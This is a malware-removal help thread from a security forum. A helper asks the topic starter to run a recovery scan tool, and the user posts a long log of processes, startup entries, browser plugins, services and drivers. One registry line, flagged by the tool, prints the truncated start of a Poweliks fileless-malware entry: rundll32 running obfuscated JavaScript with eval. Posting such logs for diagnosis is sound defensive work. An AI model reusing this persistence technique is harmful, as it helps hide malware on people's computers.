2014-09-04 05:04:15 372736 ----a-w- C:\Windows\SysWow64\rastls.dll
2014-08-29 02:07:13 3179520 ----a-w- C:\Windows\System32\rdpcorets.dll
2014-08-23 02:07:00 404480 ----a-w- C:\Windows\System32\gdi32.dll
2014-08-23 01:45:55 311808 ----a-w- C:\Windows\SysWow64\gdi32.dll
2014-08-20 02:43:42 15294296 ----a-w- C:\Windows\SysWow64\nvcompiler.dll
2014-08-20 02:43:40 22994208 ----a-w- C:\Windows\System32\nvcompiler.dll
2014-08-20 02:43:38 3196816 ----a-w- C:\Windows\System32\nvapi64.dll
2014-08-20 02:43:38 2814656 ----a-w- C:\Windows\SysWow64\nvapi.dll
2014-08-19 03:10:10 616352 ----a-w- C:\Windows\System32\winresume.efi
2014-08-19 03:08:04 503808 ----a-w- C:\Windows\System32\srcore.dll
2014-08-19 03:08:04 50176 ----a-w- C:\Windows\System32\srclient.dll
2014-08-19 03:08:03 63488 ----a-w- C:\Windows\System32\setbcdlocale.dll
2014-08-19 03:07:51 58880 ----a-w- C:\Windows\System32\appidapi.dll
2014-08-19 03:07:51 32256 ----a-w- C:\Windows\System32\appidsvc.dll
2014-08-19 03:07:33 296960 ----a-w- C:\Windows\System32\rstrui.exe
2014-08-19 03:07:11 17920 ----a-w- C:\Windows\System32\appidcertstorecheck.exe
2014-08-19 03:07:11 146944 ----a-w- C:\Windows\System32\appidpolicyconverter.exe
2014-08-19 02:41:39 43008 ----a-w- C:\Windows\SysWow64\srclient.dll
2014-08-19 02:41:22 50688 ----a-w- C:\Windows\SysWow64\appidapi.dll
2014-08-19 02:06:56 61440 ----a-w- C:\Windows\System32\drivers\appid.sys
.
============= FINISH: 15:06:14.87 ===============

#2 nasdaq

  • Malware Response Team

Posted 05 November 2014 - 09:18 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Download the version of this tool for your operating system.
Farbar Recovery Scan Tool (64 bit)
Farbar Recovery Scan Tool (32 bit)
and save it to a folder on your computer's Desktop.
Double-click to run it. When the tool opens, click Yes to the disclaimer.
Press the Scan button.
It will make a log (FRST.txt) in the same directory the tool is run from. Please copy and paste it to your reply.
The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.
===

Please paste the logs in your next reply. DO NOT ATTACH THEM unless specified.
To attach a file select the "More Reply Option" and follow the instructions.


Wait for further instructions.

#3 jmantowin

  • Topic Starter

Posted 05 November 2014 - 10:41 AM

Thank you for agreeing to help. I greatly appreciate it!

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by JoseAlcazar (administrator) on JOSEALCAZAR-PC on 05-11-2014 10:37:05
Running from C:\Users\JoseAlcazar\Videos\virus\Bleepinghelp
Loaded Profile: JoseAlcazar (Available profiles: JoseAlcazar & Guest)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.EXE
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe
(Dell, Inc.) C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Atheros) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe
(Dell) C:\Users\JoseAlcazar\AppData\Local\Apps\2.0\T64K68GD.AMZ\O6XZMXTD.PV6\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Alcor Micro Corp.) C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrobat_sl.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Toaster.exe
() C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\STService.exe
(Nullsoft, Inc.) C:\Program Files (x86)\Winamp\winampa.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6457960 2011-12-23] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1156712 2011-11-15] (Realtek Semiconductor)
HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-11-14] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2273056 2013-11-29] (NVIDIA Corporation)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\btvstack.exe [1023104 2012-12-27] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\athbttray.exe [801920 2012-12-27] (Atheros Commnucations)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2012-02-01] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-17] (Intel Corporation)
HKLM-x32\...\Run: [ShwiconXP9106] => C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe [237568 2010-03-10] (Alcor Micro Corp.)
HKLM-x32\...\Run: [Dell DataSafe Online] => C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuClient.exe [1117528 2010-08-25] (Dell, Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [AdobeCS4ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe [611712 2008-08-14] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe [44128 2013-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe [642664 2013-05-08] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe_ID0ENQBO] => C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4Tray.exe [378224 2008-08-15] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WinampAgent] => C:\Program Files (x86)\Winamp\winampa.exe [74752 2012-06-28] (Nullsoft, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-09-17] (Apple Inc.)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [450560 2013-12-22] (DivX, LLC)
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1861968 2013-11-14] ()
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-07-06] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\...\Run: [DellSystemDetect] => C:\Users\JoseAlcazar\AppData\Local\Apps\2.0\T64K68GD.AMZ\O6XZMXTD.PV6\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe [264488 2014-10-25] (Dell)
HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USCON/1
SearchScopes: HKCU - {38DD1A52-F201-4106-B199-A89A0F4F18D1} URL =
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://qtinstall.apple.com/qtactivex/qtplugin.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF [2013-12-27]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-11-05]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK

Chrome:
=======
CHR HomePage: Default -> https://www.yahoo.com/
CHR StartupUrls: Default -> "hxxp://www.yahoo.com/"
CHR DefaultSearchKeyword: Default -> conduit.search
CHR DefaultSearchURL: Default -> http://search.conduit.com/Results.aspx?ctid=CT3320691&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SPC9E6EF2F-5A94-4006-916C-319ED897D608&q={searchTerms}&SSPV=
CHR DefaultSuggestURL: Default -> http://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
CHR Profile: C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-16]
CHR Extension: (Google Drive) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-16]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-24]
CHR Extension: (YouTube) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-10-16]
CHR Extension: (Google Search) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-10-16]
CHR Extension: (Google Wallet) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-26]
CHR Extension: (Gmail) - C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-10-16]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 Adobe Version Cue CS4; C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe [284016 2008-08-15] (Adobe Systems Incorporated)
S2 DellDigitalDelivery; C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [173056 2012-08-02] (Dell Products, LP.) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe [265040 2014-10-02] (Symantec Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1370912 2013-11-29] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15128352 2013-11-29] (NVIDIA Corporation)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [327296 2012-12-27] (Atheros)
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2012-12-26] (Atheros)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20141030.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20141103.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
S3 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-05] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141104.004\ENG64.SYS [129752 2014-08-21] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141104.004\EX64.SYS [2137304 2014-08-21] (Symantec Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-10-30] (NVIDIA Corporation)
